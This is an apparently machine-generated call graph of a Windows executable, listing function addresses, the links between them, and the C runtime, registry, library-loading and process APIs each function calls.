20263 7ff764a267ac wprintf 14 API calls 20262->20263 20268 7ff764a32483 _handle_error 20263->20268 20265 7ff764a324b8 20264->20265 20266 7ff764a2b818 5 API calls 20265->20266 20269 7ff764a324c9 20265->20269 20266->20269 20268->20223 20276 7ff764a313d8 20269->20276 20271 7ff764a27c7a 20270->20271 20272 7ff764a325c8 26 API calls 20271->20272 20274 7ff764a27ce0 20271->20274 20272->20271 20273 7ff764a27dcf 20273->20226 20274->20273 20275 7ff764a325c8 26 API calls 20274->20275 20275->20274 20277 7ff764a31415 20276->20277 20282 7ff764a313fc 20276->20282 20278 7ff764a2dda8 wprintf WideCharToMultiByte 20277->20278 20285 7ff764a3141a 20277->20285 20279 7ff764a3146d 20278->20279 20281 7ff764a31474 GetLastError 20279->20281 20284 7ff764a3149d 20279->20284 20279->20285 20280 7ff764a2681c _get_daylight 14 API calls 20280->20282 20283 7ff764a267ac wprintf 14 API calls 20281->20283 20282->20268 20287 7ff764a31481 20283->20287 20286 7ff764a2dda8 wprintf WideCharToMultiByte 20284->20286 20285->20280 20285->20282 20288 7ff764a314c4 20286->20288 20289 7ff764a2681c _get_daylight 14 API calls 20287->20289 20288->20281 20288->20282 20289->20282 20466 7ff764a25304 20473 7ff764a2f528 EnterCriticalSection 20466->20473 20290 7ff764a282c4 20293 7ff764a28248 20290->20293 20300 7ff764a2f528 EnterCriticalSection 20293->20300 20046 7ff764a2c96c 20047 7ff764a2c986 20046->20047 20048 7ff764a2c971 20046->20048 20052 7ff764a2c98c 20048->20052 20053 7ff764a2c9d6 20052->20053 20054 7ff764a2c9ce 20052->20054 20056 7ff764a2b560 __free_lconv_mon 14 API calls 20053->20056 20055 7ff764a2b560 __free_lconv_mon 14 API calls 20054->20055 20055->20053 20057 7ff764a2c9e3 20056->20057 20058 7ff764a2b560 __free_lconv_mon 14 API calls 20057->20058 20059 7ff764a2c9f0 20058->20059 20060 7ff764a2b560 __free_lconv_mon 14 API calls 20059->20060 20061 7ff764a2c9fd 20060->20061 20062 7ff764a2b560 __free_lconv_mon 14 API calls 20061->20062 20063 7ff764a2ca0a 20062->20063 20064 7ff764a2b560 __free_lconv_mon 14 API calls 20063->20064 20065 7ff764a2ca17 20064->20065 20066 7ff764a2b560 __free_lconv_mon 14 API calls 20065->20066 20067 7ff764a2ca24 20066->20067 20068 7ff764a2b560 __free_lconv_mon 14 API calls 20067->20068 20069 7ff764a2ca31 20068->20069 20070 7ff764a2b560 __free_lconv_mon 14 API calls 20069->20070 20071 7ff764a2ca41 20070->20071 20072 7ff764a2b560 __free_lconv_mon 14 API calls 20071->20072 20073 7ff764a2ca51 20072->20073 20078 7ff764a2c83c 20073->20078 20092 7ff764a2f528 EnterCriticalSection 20078->20092 17321 7ff764a1f99c 17322 7ff764a1f9b9 GetModuleHandleW 17321->17322 17323 7ff764a1fa03 17321->17323 17322->17323 17329 7ff764a1f9c6 17322->17329 17331 7ff764a1f894 17323->17331 17326 7ff764a1fa45 17328 7ff764a1fa57 17329->17323 17345 7ff764a1faa4 GetModuleHandleExW 17329->17345 17351 7ff764a2f528 EnterCriticalSection 17331->17351 17333 7ff764a1f8b0 17334 7ff764a1f8cc 14 API calls 17333->17334 17335 7ff764a1f8b9 17334->17335 17336 7ff764a2f57c _isindst LeaveCriticalSection 17335->17336 17337 7ff764a1f8c1 17336->17337 17337->17326 17338 7ff764a1fa58 17337->17338 17352 7ff764a307e8 17338->17352 17341 7ff764a1fa92 17343 7ff764a1faa4 3 API calls 17341->17343 17342 7ff764a1fa81 GetCurrentProcess TerminateProcess 17342->17341 17344 7ff764a1fa99 ExitProcess 17343->17344 17346 7ff764a1faca GetProcAddress 17345->17346 17347 7ff764a1fae9 17345->17347 17346->17347 17348 7ff764a1fae1 17346->17348 17349 7ff764a1faf9 17347->17349 17350 7ff764a1faf3 FreeLibrary 17347->17350 17348->17347 17349->17323 17350->17349 17353 7ff764a1fa65 17352->17353 17354 7ff764a30806 17352->17354 17353->17341 17353->17342 17356 7ff764a2b778 17354->17356 17359 7ff764a2b5a0 17356->17359 17360 7ff764a2b601 17359->17360 17366 7ff764a2b5fc try_get_function 17359->17366 17360->17353 17361 7ff764a2b6e4 17361->17360 17364 7ff764a2b6f2 GetProcAddress 17361->17364 17362 7ff764a2b630 LoadLibraryExW 17363 7ff764a2b651 GetLastError 17362->17363 17362->17366 17363->17366 17364->17360 17365 7ff764a2b6c9 FreeLibrary 17365->17366 17366->17360 17366->17361 17366->17362 17366->17365 17367 7ff764a2b68b LoadLibraryExW 17366->17367 17367->17366 19833 7ff764a1cbdc 19834 7ff764a1cbe7 19833->19834 19842 7ff764a2bcd8 19834->19842 19855 7ff764a2f528 EnterCriticalSection 19842->19855 17368 7ff764a1a7a4 17391 7ff764a1acbc 17368->17391 17371 7ff764a1a8f0 17428 7ff764a1afe4 IsProcessorFeaturePresent 17371->17428 17372 7ff764a1a7c0 __scrt_acquire_startup_lock 17374 7ff764a1a8fa 17372->17374 17382 7ff764a1a7de __scrt_release_startup_lock 17372->17382 17375 7ff764a1afe4 7 API calls 17374->17375 17377 7ff764a1a905 sscanf 17375->17377 17376 7ff764a1a803 17378 7ff764a1a889 17397 7ff764a1b130 17378->17397 17380 7ff764a1a88e 17400 7ff764a27fe4 17380->17400 17382->17376 17382->17378 17417 7ff764a1fb34 17382->17417 17388 7ff764a1a8b1 17388->17377 17424 7ff764a1ae50 17388->17424 17435 7ff764a1b2ac 17391->17435 17394 7ff764a1a7b8 17394->17371 17394->17372 17395 7ff764a1aceb __scrt_initialize_crt 17395->17394 17437 7ff764a1c394 17395->17437 17464 7ff764a1bb50 17397->17464 17399 7ff764a1b147 GetStartupInfoW 17399->17380 17466 7ff764a2e580 17400->17466 17402 7ff764a27ff3 17403 7ff764a1a896 17402->17403 17472 7ff764a325c8 17402->17472 17405 7ff764a11000 17403->17405 17406 7ff764a1100f 17405->17406 17407 7ff764a1106c GetCommandLineA 17406->17407 17921 7ff764a1115c 17406->17921 17842 7ff764a11304 17407->17842 17410 7ff764a1107a 17849 7ff764a111b8 17410->17849 17412 7ff764a11036 17412->17407 17413 7ff764a1115c wprintf 60 API calls 17412->17413 17413->17412 17414 7ff764a11091 17854 7ff764a11da4 17414->17854 17416 7ff764a11144 17422 7ff764a1b174 GetModuleHandleW 17416->17422 17418 7ff764a1fb58 17417->17418 17419 7ff764a1fb6a 17417->17419 17418->17378 19674 7ff764a28910 17419->19674 17423 7ff764a1b185 17422->17423 17423->17388 17426 7ff764a1ae61 17424->17426 17425 7ff764a1a8c8 17425->17376 17426->17425 17427 7ff764a1c394 __scrt_initialize_crt 7 API calls 17426->17427 17427->17425 17429 7ff764a1b00a _isindst __scrt_get_show_window_mode 17428->17429 17430 7ff764a1b029 RtlCaptureContext RtlLookupFunctionEntry 17429->17430 17431 7ff764a1b08e __scrt_get_show_window_mode 17430->17431 17432 7ff764a1b052 RtlVirtualUnwind 17430->17432 17433 7ff764a1b0c0 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17431->17433 17432->17431 17434 7ff764a1b112 _isindst 17433->17434 17434->17374 17436 7ff764a1acde __scrt_dllmain_crt_thread_attach 17435->17436 17436->17394 17436->17395 17438 7ff764a1c39c 17437->17438 17439 7ff764a1c3a6 17437->17439 17443 7ff764a1c610 17438->17443 17439->17394 17444 7ff764a1c3a1 17443->17444 17445 7ff764a1c61f 17443->17445 17447 7ff764a1c67c 17444->17447 17451 7ff764a1c84c 17445->17451 17448 7ff764a1c6a7 17447->17448 17449 7ff764a1c68a DeleteCriticalSection 17448->17449 17450 7ff764a1c6ab 17448->17450 17449->17448 17450->17439 17455 7ff764a1c6b4 17451->17455 17456 7ff764a1c6f8 try_get_function 17455->17456 17462 7ff764a1c7ce TlsFree 17455->17462 17457 7ff764a1c726 LoadLibraryExW 17456->17457 17458 7ff764a1c7bd GetProcAddress 17456->17458 17456->17462 17463 7ff764a1c769 LoadLibraryExW 17456->17463 17459 7ff764a1c747 GetLastError 17457->17459 17460 7ff764a1c79d 17457->17460 17458->17462 17459->17456 17460->17458 17461 7ff764a1c7b4 FreeLibrary 17460->17461 17461->17458 17463->17456 17463->17460 17465 7ff764a1bb30 17464->17465 17465->17399 17465->17465 17467 7ff764a2e58d 17466->17467 17471 7ff764a2e5d2 17466->17471 17476 7ff764a2cbc0 17467->17476 17471->17402 17473 7ff764a32550 17472->17473 17474 7ff764a1d120 sscanf 26 API calls 17473->17474 17475 7ff764a32574 17474->17475 17475->17402 17477 7ff764a2cbd1 17476->17477 17481 7ff764a2cbd6 17476->17481 17519 7ff764a2b9c0 17477->17519 17482 7ff764a2cbde 17481->17482 17523 7ff764a2ba08 17481->17523 17489 7ff764a2cc58 17482->17489 17546 7ff764a2a544 17482->17546 17485 7ff764a2cc08 17487 7ff764a2cc26 17485->17487 17488 7ff764a2cc16 17485->17488 17491 7ff764a2ba08 _invalid_parameter_noinfo 6 API calls 17487->17491 17490 7ff764a2ba08 _invalid_parameter_noinfo 6 API calls 17488->17490 17501 7ff764a2e308 17489->17501 17492 7ff764a2cc1d 17490->17492 17493 7ff764a2cc2e 17491->17493 17535 7ff764a2b560 17492->17535 17494 7ff764a2cc32 17493->17494 17495 7ff764a2cc44 17493->17495 17496 7ff764a2ba08 _invalid_parameter_noinfo 6 API calls 17494->17496 17541 7ff764a2c89c 17495->17541 17496->17492 17687 7ff764a2e4c8 17501->17687 17503 7ff764a2e331 17702 7ff764a2e014 17503->17702 17506 7ff764a2e34b 17506->17471 17508 7ff764a2e3f7 17510 7ff764a2b560 __free_lconv_mon 14 API calls 17508->17510 17509 7ff764a2e35c 17509->17508 17716 7ff764a2e5fc 17509->17716 17510->17506 17512 7ff764a2e3eb 17513 7ff764a2e3f2 17512->17513 17516 7ff764a2e417 17512->17516 17514 7ff764a2681c _get_daylight 14 API calls 17513->17514 17514->17508 17515 7ff764a2e454 17515->17508 17725 7ff764a2de58 17515->17725 17516->17515 17517 7ff764a2b560 __free_lconv_mon 14 API calls 17516->17517 17517->17515 17520 7ff764a2b5a0 try_get_function 5 API calls 17519->17520 17521 7ff764a2b9e7 TlsGetValue 17520->17521 17524 7ff764a2b5a0 try_get_function 5 API calls 17523->17524 17525 7ff764a2ba36 17524->17525 17526 7ff764a2ba48 TlsSetValue 17525->17526 17527 7ff764a2ba40 17525->17527 17526->17527 17527->17482 17528 7ff764a2b4e8 17527->17528 17533 7ff764a2b4f9 _invalid_parameter_noinfo 17528->17533 17529 7ff764a2b54a 17558 7ff764a2681c 17529->17558 17530 7ff764a2b52e HeapAlloc 17531 7ff764a2b548 17530->17531 17530->17533 17531->17485 17533->17529 17533->17530 17555 7ff764a33020 17533->17555 17536 7ff764a2b565 HeapFree 17535->17536 17537 7ff764a2b595 __free_lconv_mon 17535->17537 17536->17537 17538 7ff764a2b580 17536->17538 17537->17482 17539 7ff764a2681c _get_daylight 12 API calls 17538->17539 17540 7ff764a2b585 GetLastError 17539->17540 17540->17537 17590 7ff764a2c774 17541->17590 17604 7ff764a330cc 17546->17604 17561 7ff764a33050 17555->17561 17567 7ff764a2cc68 GetLastError 17558->17567 17560 7ff764a26825 17560->17531 17566 7ff764a2f528 EnterCriticalSection 17561->17566 17568 7ff764a2cc8f 17567->17568 17569 7ff764a2cc8a 17567->17569 17571 7ff764a2ba08 _invalid_parameter_noinfo 6 API calls 17568->17571 17574 7ff764a2cc97 SetLastError 17568->17574 17570 7ff764a2b9c0 _invalid_parameter_noinfo 6 API calls 17569->17570 17570->17568 17572 7ff764a2ccb2 17571->17572 17573 7ff764a2b4e8 _invalid_parameter_noinfo 12 API calls 17572->17573 17572->17574 17576 7ff764a2ccc5 17573->17576 17574->17560 17577 7ff764a2cce3 17576->17577 17578 7ff764a2ccd3 17576->17578 17580 7ff764a2ba08 _invalid_parameter_noinfo 6 API calls 17577->17580 17579 7ff764a2ba08 _invalid_parameter_noinfo 6 API calls 17578->17579 17581 7ff764a2ccda 17579->17581 17582 7ff764a2cceb 17580->17582 17586 7ff764a2b560 __free_lconv_mon 12 API calls 17581->17586 17583 7ff764a2cd01 17582->17583 17584 7ff764a2ccef 17582->17584 17585 7ff764a2c89c _invalid_parameter_noinfo 12 API calls 17583->17585 17587 7ff764a2ba08 _invalid_parameter_noinfo 6 API calls 17584->17587 17588 7ff764a2cd09 17585->17588 17586->17574 17587->17581 17589 7ff764a2b560 __free_lconv_mon 12 API calls 17588->17589 17589->17574 17602 7ff764a2f528 EnterCriticalSection 17590->17602 17636 7ff764a33084 17604->17636 17641 7ff764a2f528 EnterCriticalSection 17636->17641 17688 7ff764a2e4eb 17687->17688 17689 7ff764a2e4f5 17688->17689 17740 7ff764a2f528 EnterCriticalSection 17688->17740 17691 7ff764a2e567 17689->17691 17694 7ff764a2a544 sscanf 26 API calls 17689->17694 17691->17503 17695 7ff764a2e57f 17694->17695 17697 7ff764a2e5d2 17695->17697 17699 7ff764a2cbc0 26 API calls 17695->17699 17697->17503 17700 7ff764a2e5bc 17699->17700 17701 7ff764a2e308 36 API calls 17700->17701 17701->17697 17741 7ff764a1d120 17702->17741 17705 7ff764a2e046 17707 7ff764a2e04b GetACP 17705->17707 17708 7ff764a2e05b 17705->17708 17706 7ff764a2e034 GetOEMCP 17706->17708 17707->17708 17708->17506 17709 7ff764a2c044 17708->17709 17710 7ff764a2c08f 17709->17710 17714 7ff764a2c053 _invalid_parameter_noinfo 17709->17714 17712 7ff764a2681c _get_daylight 14 API calls 17710->17712 17711 7ff764a2c076 HeapAlloc 17713 7ff764a2c08d 17711->17713 17711->17714 17712->17713 17713->17509 17714->17710 17714->17711 17715 7ff764a33020 _invalid_parameter_noinfo 2 API calls 17714->17715 17715->17714 17717 7ff764a2e014 28 API calls 17716->17717 17718 7ff764a2e627 17717->17718 17719 7ff764a2e664 IsValidCodePage 17718->17719 17722 7ff764a2e6a7 __scrt_get_show_window_mode _handle_error 17718->17722 17720 7ff764a2e675 17719->17720 17719->17722 17721 7ff764a2e6ac GetCPInfo 17720->17721 17723 7ff764a2e67e __scrt_get_show_window_mode 17720->17723 17721->17722 17721->17723 17722->17512 17773 7ff764a2e124 17723->17773 17841 7ff764a2f528 EnterCriticalSection 17725->17841 17742 7ff764a1d13f 17741->17742 17743 7ff764a1d144 17741->17743 17742->17705 17742->17706 17743->17742 17744 7ff764a2caec sscanf 26 API calls 17743->17744 17745 7ff764a1d15f 17744->17745 17749 7ff764a2cd94 17745->17749 17750 7ff764a2cda9 17749->17750 17752 7ff764a1d182 17749->17752 17750->17752 17757 7ff764a32dc4 17750->17757 17753 7ff764a2cdc8 17752->17753 17754 7ff764a2cddd 17753->17754 17756 7ff764a2cdf0 17753->17756 17754->17756 17770 7ff764a2e5e0 17754->17770 17756->17742 17758 7ff764a2caec sscanf 26 API calls 17757->17758 17759 7ff764a32dd3 17758->17759 17760 7ff764a32e1e 17759->17760 17769 7ff764a2f528 EnterCriticalSection 17759->17769 17760->17752 17771 7ff764a2caec sscanf 26 API calls 17770->17771 17772 7ff764a2e5e9 17771->17772 17774 7ff764a2e161 GetCPInfo 17773->17774 17781 7ff764a2e257 _handle_error 17773->17781 17777 7ff764a2e174 17774->17777 17774->17781 17782 7ff764a32900 17777->17782 17781->17722 17783 7ff764a1d120 sscanf 26 API calls 17782->17783 17784 7ff764a32942 17783->17784 17800 7ff764a2dd4c 17784->17800 17801 7ff764a2dd54 MultiByteToWideChar 17800->17801 17925 7ff764a1127c 17842->17925 17845 7ff764a1132b 17847 7ff764a1127c 52 API calls 17845->17847 17848 7ff764a1137f 17845->17848 17931 7ff764a113b8 17845->17931 17935 7ff764a111ec 17845->17935 17847->17845 17848->17410 17850 7ff764a111c1 17849->17850 17851 7ff764a111c6 17850->17851 17852 7ff764a1f670 52 API calls 17850->17852 17851->17414 17853 7ff764a111d7 17852->17853 17973 7ff764a165ec 17854->17973 17856 7ff764a11e5e 17857 7ff764a1115c wprintf 60 API calls 17856->17857 17860 7ff764a11f59 17856->17860 17858 7ff764a11e77 17857->17858 17863 7ff764a1115c wprintf 60 API calls 17858->17863 17859 7ff764a11faa 17978 7ff764a138c8 17859->17978 17860->17859 17862 7ff764a1115c wprintf 60 API calls 17860->17862 17868 7ff764a11f6e 17862->17868 17865 7ff764a11e9f 17863->17865 17864 7ff764a11fbd 18018 7ff764a1593c 17864->18018 17869 7ff764a1115c wprintf 60 API calls 17865->17869 17867 7ff764a11f9c 18042 7ff764a117b4 17867->18042 17868->17867 17872 7ff764a1115c wprintf 60 API calls 17868->17872 17873 7ff764a11eb9 17869->17873 17871 7ff764a11ff8 17874 7ff764a1200f 17871->17874 18055 7ff764a13e6c 17871->18055 17872->17868 17875 7ff764a1115c wprintf 60 API calls 17873->17875 17879 7ff764a12027 17874->17879 17880 7ff764a12022 17874->17880 17877 7ff764a11ecc 17875->17877 17878 7ff764a1115c wprintf 60 API calls 17877->17878 17881 7ff764a11edf 17878->17881 18068 7ff764a16a04 17879->18068 18063 7ff764a15660 17880->18063 17884 7ff764a1115c wprintf 60 API calls 17881->17884 17885 7ff764a11ef9 17884->17885 17887 7ff764a1115c wprintf 60 API calls 17885->17887 17886 7ff764a1203f 17888 7ff764a12043 _handle_error 17886->17888 17890 7ff764a15660 2 API calls 17886->17890 17894 7ff764a1205b 17886->17894 17889 7ff764a11f0c 17887->17889 17888->17416 17891 7ff764a1115c wprintf 60 API calls 17889->17891 17890->17894 17892 7ff764a11f1f 17891->17892 17893 7ff764a1115c wprintf 60 API calls 17892->17893 17896 7ff764a11f2b 17893->17896 18077 7ff764a112a8 17894->18077 17901 7ff764a1115c wprintf 60 API calls 17896->17901 17898 7ff764a1208f 18081 7ff764a142a8 17898->18081 17899 7ff764a120c0 18115 7ff764a13de4 17899->18115 17901->17860 17905 7ff764a120b2 17905->17888 18123 7ff764a12be4 17905->18123 17908 7ff764a1223a 17910 7ff764a117b4 55 API calls 17908->17910 17911 7ff764a12248 17910->17911 18144 7ff764a169b8 17911->18144 17913 7ff764a12184 17913->17908 17914 7ff764a111b8 52 API calls 17913->17914 17918 7ff764a121e8 17914->17918 17915 7ff764a12138 17915->17913 17916 7ff764a111b8 52 API calls 17915->17916 17917 7ff764a12165 sprintf 17916->17917 17920 7ff764a117b4 55 API calls 17917->17920 17919 7ff764a117b4 55 API calls 17918->17919 17919->17908 17920->17913 17922 7ff764a11187 wprintf 17921->17922 17923 7ff764a1ed08 wprintf 60 API calls 17922->17923 17924 7ff764a111a5 17923->17924 17924->17412 17940 7ff764a28930 17925->17940 17927 7ff764a11285 17928 7ff764a1128a 17927->17928 17948 7ff764a1f670 17927->17948 17928->17845 17932 7ff764a113f0 CharNextExA 17931->17932 17933 7ff764a115b8 17932->17933 17934 7ff764a11410 17932->17934 17933->17845 17934->17932 17934->17933 17936 7ff764a111f5 17935->17936 17937 7ff764a111fa 17936->17937 17938 7ff764a1f670 52 API calls 17936->17938 17937->17845 17939 7ff764a1120b 17938->17939 17941 7ff764a28947 17940->17941 17944 7ff764a28978 17940->17944 17941->17944 17963 7ff764a2a4e4 17941->17963 17944->17927 17945 7ff764a2898f 17946 7ff764a2b4a0 _isindst 9 API calls 17945->17946 17947 7ff764a289a4 17946->17947 17947->17927 17972 7ff764a2f748 EnterCriticalSection 17948->17972 17964 7ff764a2a4fb 17963->17964 17965 7ff764a2a4f1 17963->17965 17966 7ff764a2681c _get_daylight 14 API calls 17964->17966 17965->17964 17968 7ff764a2a516 17965->17968 17971 7ff764a2a502 17966->17971 17967 7ff764a2b480 _invalid_parameter_noinfo 23 API calls 17969 7ff764a28974 17967->17969 17968->17969 17970 7ff764a2681c _get_daylight 14 API calls 17968->17970 17969->17944 17969->17945 17970->17971 17971->17967 17974 7ff764a1bb50 __scrt_get_show_window_mode 17973->17974 17975 7ff764a16604 InitCommonControlsEx 17974->17975 18147 7ff764a11218 17975->18147 17979 7ff764a1394a __scrt_get_show_window_mode 17978->17979 17980 7ff764a1397b 17979->17980 17981 7ff764a13963 17979->17981 17982 7ff764a111b8 52 API calls 17980->17982 17983 7ff764a1127c 52 API calls 17981->17983 17988 7ff764a13973 _handle_error 17981->17988 18003 7ff764a13988 17982->18003 17983->17988 17985 7ff764a13c62 17985->17988 18165 7ff764a17454 17985->18165 17986 7ff764a13d82 17989 7ff764a16630 61 API calls 17986->17989 17987 7ff764a1127c 52 API calls 17987->17985 17988->17864 17994 7ff764a13d9f 17989->17994 17991 7ff764a13b40 17991->17986 17995 7ff764a111b8 52 API calls 17991->17995 17998 7ff764a13ba8 17991->17998 18006 7ff764a13bff 17991->18006 17992 7ff764a13c80 17993 7ff764a13c88 17992->17993 17992->17994 18169 7ff764a16cc4 17993->18169 17999 7ff764a16630 61 API calls 17994->17999 17995->17998 17997 7ff764a111b8 52 API calls 17997->18006 17998->17997 17998->18006 18004 7ff764a13dbb 17999->18004 18000 7ff764a13c92 18001 7ff764a112a8 60 API calls 18000->18001 18002 7ff764a13cd5 18001->18002 18005 7ff764a13cda 18002->18005 18013 7ff764a13cf5 18002->18013 18003->17991 18151 7ff764a14698 18003->18151 18007 7ff764a16630 61 API calls 18004->18007 18185 7ff764a1713c 18005->18185 18006->17985 18006->17987 18010 7ff764a13dd7 18007->18010 18008 7ff764a13d0e 18191 7ff764a15c4c 18008->18191 18011 7ff764a13ceb 18011->18004 18012 7ff764a13cf3 18011->18012 18012->17988 18013->18008 18014 7ff764a13d69 18013->18014 18232 7ff764a16630 18014->18232 18017 7ff764a13d77 18017->17986 18023 7ff764a15995 18018->18023 18020 7ff764a16630 61 API calls 18025 7ff764a15c14 18020->18025 18021 7ff764a15a25 18028 7ff764a15bfd 18021->18028 18848 7ff764a1348c 18021->18848 18039 7ff764a15be4 18023->18039 18831 7ff764a16220 18023->18831 18024 7ff764a15a79 18024->18025 18873 7ff764a11924 18024->18873 18027 7ff764a16630 61 API calls 18025->18027 18026 7ff764a16630 61 API calls 18026->18028 18030 7ff764a15c2b 18027->18030 18028->18020 18031 7ff764a16630 61 API calls 18030->18031 18032 7ff764a15c40 18031->18032 18034 7ff764a15a94 18034->18030 18893 7ff764a277cc 18034->18893 18036 7ff764a15bd2 18038 7ff764a16630 61 API calls 18036->18038 18037 7ff764a15ba9 _handle_error 18037->17871 18038->18039 18039->18026 18040 7ff764a161d4 26 API calls 18041 7ff764a15b21 18040->18041 18041->18037 18041->18040 18043 7ff764a117d9 18042->18043 18048 7ff764a117f7 memcpy_s 18042->18048 18044 7ff764a11809 18043->18044 18045 7ff764a117e3 18043->18045 18047 7ff764a111b8 52 API calls 18044->18047 18046 7ff764a111b8 52 API calls 18045->18046 18046->18048 18047->18048 18049 7ff764a1188e 18048->18049 19397 7ff764a14498 18048->19397 18051 7ff764a14498 29 API calls 18049->18051 18052 7ff764a118c5 18049->18052 18051->18052 18053 7ff764a118fc 18052->18053 18054 7ff764a14498 29 API calls 18052->18054 18053->17859 18054->18053 18056 7ff764a1406e 18055->18056 18059 7ff764a13e74 __vcrt_freefls 18055->18059 18056->17874 18057 7ff764a111b8 52 API calls 18058 7ff764a13fbd GetCurrentProcessId 18057->18058 18058->18059 18059->18056 18059->18057 18060 7ff764a111b8 52 API calls 18059->18060 18062 7ff764a1115c 60 API calls wprintf 18059->18062 18061 7ff764a14000 GetCurrentProcessId 18060->18061 18061->18059 18062->18059 18064 7ff764a1566d QueryPerformanceFrequency 18063->18064 18065 7ff764a15689 18063->18065 18064->18065 18066 7ff764a15697 QueryPerformanceCounter 18065->18066 18067 7ff764a15693 18065->18067 18066->18067 18067->17879 18069 7ff764a112a8 60 API calls 18068->18069 18070 7ff764a16a28 18069->18070 18071 7ff764a16aa0 93 API calls 18070->18071 18072 7ff764a16a2d LoadLibraryA 18071->18072 18073 7ff764a16a47 GetProcAddress GetProcAddress 18072->18073 18074 7ff764a16a3e 18072->18074 18073->18074 18075 7ff764a16a79 18074->18075 18076 7ff764a16630 61 API calls 18074->18076 18075->17886 18076->18075 18078 7ff764a112f9 18077->18078 18079 7ff764a112d2 wprintf 18077->18079 18078->17898 18078->17899 18080 7ff764a1ed08 wprintf 60 API calls 18079->18080 18080->18078 18082 7ff764a111b8 52 API calls 18081->18082 18086 7ff764a142e8 18082->18086 18083 7ff764a120a4 18094 7ff764a115fc 18083->18094 18084 7ff764a14326 18085 7ff764a14359 18084->18085 18089 7ff764a14432 18084->18089 18087 7ff764a1127c 52 API calls 18085->18087 18092 7ff764a14382 18085->18092 18086->18084 18088 7ff764a1127c 52 API calls 18086->18088 18087->18085 18088->18086 18090 7ff764a16630 61 API calls 18089->18090 18091 7ff764a1443e 18090->18091 18092->18083 18093 7ff764a17a14 66 API calls 18092->18093 18093->18092 18095 7ff764a1163c 18094->18095 18096 7ff764a1169a 18095->18096 18098 7ff764a17a14 66 API calls 18095->18098 18097 7ff764a1618c GetModuleFileNameA 18096->18097 18099 7ff764a116a9 18097->18099 18106 7ff764a1164e 18098->18106 18100 7ff764a116ad 18099->18100 18101 7ff764a116c0 18099->18101 18102 7ff764a16630 61 API calls 18100->18102 18103 7ff764a111b8 52 API calls 18101->18103 18105 7ff764a116b9 _handle_error 18102->18105 18104 7ff764a116d3 sprintf 18103->18104 18108 7ff764a117b4 55 API calls 18104->18108 18105->17905 18106->18096 18107 7ff764a111b8 52 API calls 18106->18107 18109 7ff764a1167b sprintf 18107->18109 18110 7ff764a116f4 18108->18110 18112 7ff764a117b4 55 API calls 18109->18112 18111 7ff764a111b8 52 API calls 18110->18111 18114 7ff764a1172a 18111->18114 18112->18096 18113 7ff764a117b4 55 API calls 18113->18105 18114->18113 18116 7ff764a13de9 18115->18116 18122 7ff764a13e4c 18115->18122 18117 7ff764a17a14 66 API calls 18116->18117 18118 7ff764a13e00 18117->18118 18119 7ff764a111b8 52 API calls 18118->18119 18118->18122 18120 7ff764a13e2d sprintf 18119->18120 18121 7ff764a117b4 55 API calls 18120->18121 18121->18122 18122->17905 18125 7ff764a1210e 18123->18125 18132 7ff764a12c2b sprintf 18123->18132 18124 7ff764a130b3 18127 7ff764a16630 61 API calls 18124->18127 18125->17888 18125->17913 18134 7ff764a17a14 18125->18134 18126 7ff764a13de4 66 API calls 18126->18132 18127->18125 18128 7ff764a117b4 55 API calls 18128->18132 18129 7ff764a130cd 19561 7ff764a122a0 18129->19561 18131 7ff764a111b8 52 API calls 18131->18132 18132->18124 18132->18125 18132->18126 18132->18128 18132->18129 18132->18131 18133 7ff764a16630 61 API calls 18132->18133 18133->18132 18135 7ff764a17a30 18134->18135 18136 7ff764a17a35 18135->18136 19567 7ff764a178fc 18135->19567 18136->17915 18142 7ff764a17a59 18142->18136 18143 7ff764a1115c wprintf 60 API calls 18142->18143 18143->18136 19599 7ff764a14168 18144->19599 18146 7ff764a169dd 18148 7ff764a11228 18147->18148 18149 7ff764a11247 18148->18149 18150 7ff764a112a8 60 API calls 18148->18150 18149->17856 18150->18149 18243 7ff764a29364 18151->18243 18154 7ff764a147e0 18154->17991 18156 7ff764a146ea 18157 7ff764a147e9 18156->18157 18256 7ff764a150bc 18156->18256 18159 7ff764a28b28 28 API calls 18157->18159 18159->18154 18160 7ff764a14700 18160->18157 18164 7ff764a14710 18160->18164 18161 7ff764a147d9 18260 7ff764a28b28 18161->18260 18163 7ff764a289e4 26 API calls 18163->18164 18164->18161 18164->18163 18166 7ff764a17478 18165->18166 18168 7ff764a1748e 18165->18168 18167 7ff764a1127c 52 API calls 18166->18167 18166->18168 18167->18168 18168->17992 18170 7ff764a16d0b RegOpenKeyExA 18169->18170 18171 7ff764a16d38 RegEnumKeyA 18170->18171 18181 7ff764a16d5f 18170->18181 18171->18181 18172 7ff764a16e67 RegCloseKey 18172->18181 18173 7ff764a1713c 55 API calls 18173->18181 18174 7ff764a16d9e RegEnumKeyA 18174->18181 18175 7ff764a16e7a _handle_error 18175->18000 18177 7ff764a1127c 52 API calls 18177->18181 18178 7ff764a16dc1 RegOpenKeyExA 18178->18181 18179 7ff764a16e03 RegQueryValueExA 18179->18181 18180 7ff764a16df6 RegCloseKey 18180->18181 18181->18170 18181->18172 18181->18173 18181->18174 18181->18175 18181->18177 18181->18178 18181->18179 18181->18180 18182 7ff764a16e45 RegCloseKey 18181->18182 18183 7ff764a16ea5 18181->18183 18692 7ff764a17254 18181->18692 18182->18181 18183->18175 18184 7ff764a16eaf RegCloseKey 18183->18184 18184->18175 18186 7ff764a1127c 52 API calls 18185->18186 18187 7ff764a1715f 18186->18187 18189 7ff764a17254 55 API calls 18187->18189 18190 7ff764a1722b 18187->18190 18722 7ff764a1736c 18187->18722 18189->18187 18190->18011 18729 7ff764a11d94 18191->18729 18193 7ff764a15c8b GetModuleFileNameA 18194 7ff764a160f8 18193->18194 18195 7ff764a15caa 18193->18195 18196 7ff764a16728 64 API calls 18194->18196 18195->18194 18197 7ff764a112a8 60 API calls 18195->18197 18198 7ff764a16108 18196->18198 18199 7ff764a15cc5 18197->18199 18200 7ff764a112a8 60 API calls 18199->18200 18201 7ff764a15cd4 18200->18201 18730 7ff764a2a3e4 18201->18730 18203 7ff764a15ceb 18204 7ff764a16057 _handle_error 18203->18204 18205 7ff764a15d0d GetCommandLineA 18203->18205 18204->17988 18206 7ff764a1127c 52 API calls 18205->18206 18207 7ff764a15d1b 18206->18207 18208 7ff764a111b8 52 API calls 18207->18208 18231 7ff764a15d52 18208->18231 18209 7ff764a15fc7 wprintf 18746 7ff764a27088 18209->18746 18210 7ff764a111b8 52 API calls 18210->18231 18211 7ff764a1127c 52 API calls 18212 7ff764a15f91 18211->18212 18215 7ff764a1115c wprintf 60 API calls 18212->18215 18214 7ff764a15fde wprintf 18217 7ff764a27088 56 API calls 18214->18217 18216 7ff764a15fb6 18215->18216 18218 7ff764a1115c wprintf 60 API calls 